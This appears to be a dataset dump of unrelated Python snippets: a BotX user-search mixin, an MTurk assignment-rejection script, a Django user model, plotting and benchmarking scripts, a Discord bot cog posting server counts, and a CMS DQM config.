raw_vlr.header.description.rstrip(NULL_BYTE).decode(),
)
vlr.record_data = raw_vlr.record_data
return vlr
def __repr__(self):
return "<{}(user_id: '{}', record_id: '{}', data len: '{}')>".format(
self.__class__.__name__, self.user_id, self.record_id, len(self.record_data)
)
|
"""Mixin for shortcut for users resource requests."""
from typing import Optional, Tuple
from uuid import UUID
from botx.bots.mixins.requests.call_protocol import BotXMethodCallProtocol
from botx.clients.methods.v3.users.by_email import ByEmail
from botx.clients.methods.v3.users.by_huid import ByHUID
from botx.clients.methods.v3.users.by_login import ByLogin
from botx.models.messages.sending.credentials import SendingCredentials
from botx.models.users import UserFromSearch
class UsersRequestsMixin:
"""Mixin for shortcut for users resource requests."""
async def search_user(
self: BotXMethodCallProtocol,
credentials: SendingCredentials,
*,
user_huid: Optional[UUID] = None,
email: Optional[str] = None,
ad: Optional[Tuple[str, str]] = None,
) -> UserFromSearch:
"""Search user by one of provided params for search.
Arguments:
credentials: credentials for making request.
user_huid: HUID of user.
email: email of user.
ad: AD login and domain of user.
Returns:
Information about user.
Raises:
ValueError: raised if none of provided params were filled.
"""
if user_huid is not None:
return await self.call_method(
ByHUID(user_huid=user_huid),
credentials=credentials,
)
elif email is not None:
return await self.call_method(ByEmail(email=email), credentials=credentials)
elif ad is not None:
return await self.call_method(
ByLogin(ad_login=ad[0], ad_domain=ad[1]),
credentials=credentials,
)
raise ValueError("one of user_huid, email or ad query_params should be filled")
|
#! /usr/bin/env python
# Usage: dgslandmarks2ndeobj_params.py <dgsfile> <texchan>
# to load landmarks and scalefactor from a .dgsfile
#
# <texchan> e.g. CR03_SPAR_01H_tex
import sys
import json
import dg_file as dgf
import dg_eval
dgsname=sys.argv[1]
texchan=sys.argv[2]
(md,wfmdict)=dgf.loadsnapshot(dgsname)
(ndim,DimLen,IniVal,Step,bases) = dg_eval.geom(wfmdict[texchan])
scalefactor_x=Step[0]*DimLen[0]
scalefactor_y=Step[1]*DimLen[1]
LandmarkDict={}
# We don't distinguish here between landmarks and fiducials
# for the time being
# Also assume only a single surface!!!
surfaceid = 0
for mdname in wfmdict[texchan].MetaData.keys():
if ((mdname.startswith("LANDMARK_")
or mdname.startswith("FIDUCIAL_")) and
mdname.endswith("_X")):
LandmarkName=mdname[9:-2]
LandmarkCoords=(surfaceid,wfmdict[texchan].MetaData[mdname].Value,wfmdict[texchan].MetaData[mdname[:-1]+"Y"].Value)
LandmarkDict[LandmarkName]=LandmarkCoords
pass
# Now dump JSON
# ... suitable for ndepart.fromx3d()
uvparam_params=None # so far...
landmarks_params=(LandmarkDict,{}) # 2nd element is landmarkdict3d, which we do not yet generate
# implpartparams are the parameters of the intrinsic parameterization,
# (lowerleft_meaningfulunits, meaningfulunits_per_texcoord)
# Remember that lowerleft in terms of IniVal is the coordinate of the first point,
# whereas lowerleft in terms of texture is the lower left of the first point
implpartparams = ( (IniVal[0]-Step[0]/2.0,IniVal[1]-Step[1]/2.0), (scalefactor_x,scalefactor_y))
ndepartparams=(uvparam_params,landmarks_params,implpartparams)
ndepart_paramstr = json.dumps(ndepartparams)
print(ndepart_paramstr)
|
import argparse, json
import simpleamt
if __name__ == '__main__':
parser = argparse.ArgumentParser(parents=[simpleamt.get_parent_parser()])
args = parser.parse_args()
mtc = simpleamt.get_mturk_connection_from_args(args)
reject_ids = []
if args.hit_ids_file is None:
parser.error('Must specify --hit_ids_file.')
with open(args.hit_ids_file, 'r') as f:
hit_ids = [line.strip() for line in f]
for hit_id in hit_ids:
try:
for a in mtc.get_assignments(hit_id):
reject_ids.append(a.AssignmentId)
except:
print("Couldn't find hit_id: %s" % (hit_id))
print('This will reject %d assignments with '
'sandbox=%s' % (len(reject_ids), str(args.sandbox)))
print('Continue?')
s = input('(Y/N): ')
if s == 'Y' or s == 'y':
print('Rejecting assignments')
for idx, assignment_id in enumerate(reject_ids):
print('Rejecting assignment %d / %d' % (idx + 1, len(reject_ids)))
try:
mtc.reject_assignment(assignment_id, feedback='Invalid results')
except:
print("Could not reject: %s" % (assignment_id))
else:
print('Aborting')
|
from django.contrib.auth.base_user import AbstractBaseUser
from django.db import models
from ridi_django_oauth2.managers import RidiUserManager
class RidiUser(AbstractBaseUser):
u_idx = models.IntegerField(primary_key=True, editable=False, verbose_name='u_idx')
USERNAME_FIELD = 'u_idx'
objects = RidiUserManager()
class Meta:
db_table = 'ridi_user'
verbose_name = '사용자 계정'
verbose_name_plural = '사용자 계정 리스트'
def __str__(self):
return str(self.get_username())
|
#!/usr/bin/env python3
import csv
import matplotlib.pyplot as plt
def factor_quartiles_graph(input_file, output_file):
with open(input_file, 'r') as csvfile:
plots = csv.reader(csvfile, delimiter=';')
rows = []
x=[]
y=[]
for row in plots:
rows.append(row)
for j in range(1, len(row)):
y.append(int(rows[1][j]))
x.append(int(rows[0][j]))
plt.scatter(x,y, marker='.', color="black")
plt.tight_layout()
plt.yticks([1, 2, 3, 4], ['Q1', 'Q2', 'Q3', 'Q4'])
plt.savefig(output_file, format='eps')
# plt.show()
# plt.close()
factor_quartiles_graph('results/quartiles/apj.csv', 'results/graphs/quartiles/apj.eps')
factor_quartiles_graph('results/quartiles/americas_small.csv', 'results/graphs/quartiles/americas_small.eps')
factor_quartiles_graph('results/quartiles/advertisement.csv', 'results/graphs/quartiles/advertisement.eps')
factor_quartiles_graph('results/quartiles/customer.csv', 'results/graphs/quartiles/customer.eps')
factor_quartiles_graph('results/quartiles/dna.csv', 'results/graphs/quartiles/dna.eps')
factor_quartiles_graph('results/quartiles/firewall1.csv', 'results/graphs/quartiles/firewall1.eps')
factor_quartiles_graph('results/quartiles/tic_tac_toe.csv', 'results/graphs/quartiles/tic_tac_toe.eps')
factor_quartiles_graph('results/quartiles/mushroom.csv', 'results/graphs/quartiles/mushroom.eps')
|
#!/usr/bin/env python2
# Copyright (c) 2019 Erik Schilling
# ALL RIGHTS RESERVED.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
from emuvim.api.osm.pre_configured_osm import PreConfiguredOSM
import csv
with open('ping_pong_parallel_deploy_and_delete_%d.csv' % time.time(), 'w') as csvfile:
fieldnames = ['n', 'start', 'onboard', 'ns_start', 'num_failed', 'ns_delete', 'stop']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
MAX = 30
for n in range(0, MAX + 1, 1):
start = time.time()
with PreConfiguredOSM() as osm:
start_done = time.time()
osm.onboard_vnfd('../vnfs/ping_vnf')
osm.onboard_vnfd('../vnfs/pong_vnf')
nsd_id = osm.onboard_nsd('../services/pingpong_ns')
onboard_done = time.time()
for i in range(n):
osm.ns_create('pingpong-test-%d' % i, nsd_id)
_, num_failed = osm.ns_wait_until_all_in_status('running', 'failed')
ns_start_done = time.time()
for ns in osm.ns_list():
osm.ns_delete(ns['id'])
osm.ns_wait_until_all_in_status('terminated')
ns_delete_done = time.time()
stop_done = time.time()
measurement = {
'n': n,
'start': start_done - start,
'onboard': onboard_done - start_done,
'ns_start': ns_start_done - onboard_done,
'num_failed': num_failed,
'ns_delete': ns_delete_done - ns_start_done,
'stop': stop_done - ns_delete_done,
}
writer.writerow(measurement)
csvfile.flush()
|
"""
Created on Dec 29, 2016
@author: andrew
"""
import asyncio
import logging
import aiohttp
from discord.ext import commands
import credentials
from cogsmisc.stats import Stats
log = logging.getLogger(__name__)
DBL_API = "https://discordbots.org/api/bots/"
class Publicity(commands.Cog):
"""
Sends updates to bot repos.
"""
def __init__(self, bot):
self.bot = bot
if bot.is_cluster_0:
self.bot.loop.create_task(self.background_update())
async def update_server_count(self):
if self.bot.testing or not credentials.dbl_token:
return
payload = {"server_count": await Stats.get_guild_count(self.bot)}
async with aiohttp.ClientSession() as aioclient:
try:
await aioclient.post(f"{DBL_API}{self.bot.user.id}/stats", data=payload,
headers={"Authorization": credentials.dbl_token})
except Exception as e:
log.error(f"Error posting server count: {e}")
async def background_update(self):
try:
await self.bot.wait_until_ready()
while not self.bot.is_closed():
await self.update_server_count()
await asyncio.sleep(3600) # every hour
except asyncio.CancelledError:
pass
@commands.Cog.listener()
async def on_guild_join(self, server):
log.info('Joined server {}: {}, {} members ({} bot)'.format(server, server.id, len(server.members),
sum(1 for m in server.members if m.bot)))
@commands.Cog.listener()
async def on_guild_remove(self, server):
log.info('Left server {}: {}, {} members ({} bot)'.format(server, server.id, len(server.members),
sum(1 for m in server.members if m.bot)))
def setup(bot):
bot.add_cog(Publicity(bot))
|
import FWCore.ParameterSet.Config as cms
from DQM.GEM.GEMDQMHarvester_cfi import *
from DQMOffline.Muon.gemEfficiencyHarvesterCosmics_cfi import *
gemClientsCosmics = cms.Sequence(
GEMDQMHarvester *
gemEfficiencyHarvesterCosmics *
gemEfficiencyHarvesterCosmicsOneLeg
)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.